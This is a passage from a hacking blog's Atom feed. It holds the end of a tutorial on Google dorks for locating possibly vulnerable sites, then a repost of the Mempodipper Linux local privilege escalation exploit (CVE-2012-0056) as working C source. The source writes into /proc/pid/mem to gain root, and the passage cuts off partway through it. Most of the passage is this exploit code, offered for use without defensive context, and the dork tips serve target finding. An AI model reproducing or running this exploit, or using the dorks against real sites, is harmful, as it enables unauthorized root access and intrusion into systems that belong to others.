line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(movie which is not just a site whit advertisements: grr)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but any movie file usefull for this dork.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;have fun watching!&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;weather:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;weather: 21/12/2011 london&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Obvious aint it?&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;related:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;related:egg&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(google responds whit sites about chickons laying eggs.)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this will look for anything related to what you input.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;link:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;link:index.php?id=&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;(this is verry usefull i would say even more then inurl.)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;People always show the inurl methode?&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this one works bether instead of only looking in search url it will also look in the site for urls&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;that possibly are vulnerable.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Happy googling, hacking!&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-4757836414516560872?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/4757836414516560872/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/tut-creating-google-dorks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4757836414516560872'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4757836414516560872'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/tut-creating-google-dorks.html' title='[tut] Creating google dorks'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-2911083972317620218</id><published>2012-01-31T05:18:00.002+06:00</published><updated>2012-01-31T05:18:09.649+06:00</updated><title type='text'>Linux Local Root for =&gt; 2.6.39, 32-bit and 64-bit</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;# Exploit Title: Mempodipper - Linux Local Root for &amp;gt;=2.6.39, 32-bit and 64-bit&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;# Date: Jan 21, 2012&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;# Author: zx2c4&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;# Tested on: Gentoo, Ubuntu&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;# Platform: Linux&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;# Category: Local&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;# CVE-2012-0056&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;/*&lt;br /&gt;* Mempodipper&lt;br /&gt;* by zx2c4&lt;br /&gt;*&lt;br /&gt;* Linux Local Root Exploit&lt;br /&gt;*&lt;br /&gt;* Rather than put my write up here, per usual, this time I've put it&lt;br /&gt;* in a rather lengthy blog post: http://blog.zx2c4.com/749&lt;br /&gt;*&lt;br /&gt;* Enjoy.&lt;br /&gt;*&lt;br /&gt;* - zx2c4&lt;br /&gt;* Jan 21, 2012&lt;br /&gt;*&lt;br /&gt;* CVE-2012-0056&lt;br /&gt;*/&lt;br /&gt;#define _LARGEFILE64_SOURCE&lt;br /&gt;#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;#include &amp;lt;string.h&amp;gt;&lt;br /&gt;#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;#include &amp;lt;sys/types.h&amp;gt;&lt;br /&gt;#include &amp;lt;sys/stat.h&amp;gt;&lt;br /&gt;#include &amp;lt;sys/socket.h&amp;gt;&lt;br /&gt;#include &amp;lt;sys/un.h&amp;gt;&lt;br /&gt;#include &amp;lt;fcntl.h&amp;gt;&lt;br /&gt;#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;#include &amp;lt;limits.h&amp;gt;&lt;br /&gt;char *socket_path = "/tmp/.sockpuppet";&lt;br /&gt;int send_fd(int fd)&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char buf[1];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct iovec iov;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct msghdr msg;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct cmsghdr *cmsg;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct sockaddr_un addr;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int n;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int sock;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char cms[CMSG_SPACE(sizeof(int))];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) &amp;lt; 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;memset(&amp;amp;addr, 0, sizeof(addr));&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;addr.sun_family = AF_UNIX;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (connect(sock, (struct sockaddr*)&amp;amp;addr, sizeof(addr)) &amp;lt; 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;buf[0] = 0;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;iov.iov_base = buf;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;iov.iov_len = 1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;memset(&amp;amp;msg, 0, sizeof msg);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_iov = &amp;amp;iov;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_iovlen = 1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_control = (caddr_t)cms;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_controllen = CMSG_LEN(sizeof(int));&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmsg = CMSG_FIRSTHDR(&amp;amp;msg);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmsg-&amp;gt;cmsg_len = CMSG_LEN(sizeof(int));&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmsg-&amp;gt;cmsg_level = SOL_SOCKET;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmsg-&amp;gt;cmsg_type = SCM_RIGHTS;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;memmove(CMSG_DATA(cmsg), &amp;amp;fd, sizeof(int));&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ((n = sendmsg(sock, &amp;amp;msg, 0)) != iov.iov_len)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;close(sock);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return 0;&lt;br /&gt;}&lt;br /&gt;int recv_fd()&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int listener;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int sock;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int n;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int fd;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char buf[1];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct iovec iov;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct msghdr msg;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct cmsghdr *cmsg;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;struct sockaddr_un addr;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char cms[CMSG_SPACE(sizeof(int))];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) &amp;lt; 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;memset(&amp;amp;addr, 0, sizeof(addr));&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;addr.sun_family = AF_UNIX;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;unlink(socket_path);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (bind(listener, (struct sockaddr*)&amp;amp;addr, sizeof(addr)) &amp;lt; 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (listen(listener, 1) &amp;lt; 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ((sock = accept(listener, NULL, NULL)) &amp;lt; 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;iov.iov_base = buf;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;iov.iov_len = 1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;memset(&amp;amp;msg, 0, sizeof msg);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_name = 0;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_namelen = 0;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_iov = &amp;amp;iov;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_iovlen = 1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_control = (caddr_t)cms;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;msg.msg_controllen = sizeof cms;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ((n = recvmsg(sock, &amp;amp;msg, 0)) &amp;lt; 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (n == 0)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmsg = CMSG_FIRSTHDR(&amp;amp;msg);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;memmove(&amp;amp;fd, CMSG_DATA(cmsg), sizeof(int));&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;close(sock);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;close(listener);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return fd;&lt;br /&gt;}&lt;br /&gt;int main(int argc, char **argv)&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (argc &amp;gt; 2 &amp;amp;&amp;amp; argv[1][0] == '-' &amp;amp;&amp;amp; argv[1][1] == 'c') {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char parent_mem[256];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;sprintf(parent_mem, "/proc/%s/mem", argv[2]);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Opening parent mem %s in child.\n", parent_mem);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int fd = open(parent_mem, O_RDWR);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (fd &amp;lt; 0) {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;perror("[-] open");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return 1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Sending fd %d to parent.\n", fd);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;send_fd(fd);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return 0;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("===============================\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("=&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Mempodipper&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("=&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; by zx2c4&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("=&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Jan 21, 2012&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("===============================\n\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int parent_pid = getpid();&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (fork()) {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Waiting for transferred fd in parent.\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;int fd = recv_fd();&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Received fd at %d.\n", fd);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (fd &amp;lt; 0) {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;perror("[-] recv_fd");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return -1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Assigning fd %d to stderr.\n", fd);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;dup2(2, 6);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;dup2(fd, 2);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;unsigned long address;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (argc &amp;gt; 2 &amp;amp;&amp;amp; argv[1][0] == '-' &amp;amp;&amp;amp; argv[1][1] == 'o')&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;address = strtoul(argv[2], NULL, 16);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Reading su for exit@plt.\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;// Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;FILE *command = popen("objdump 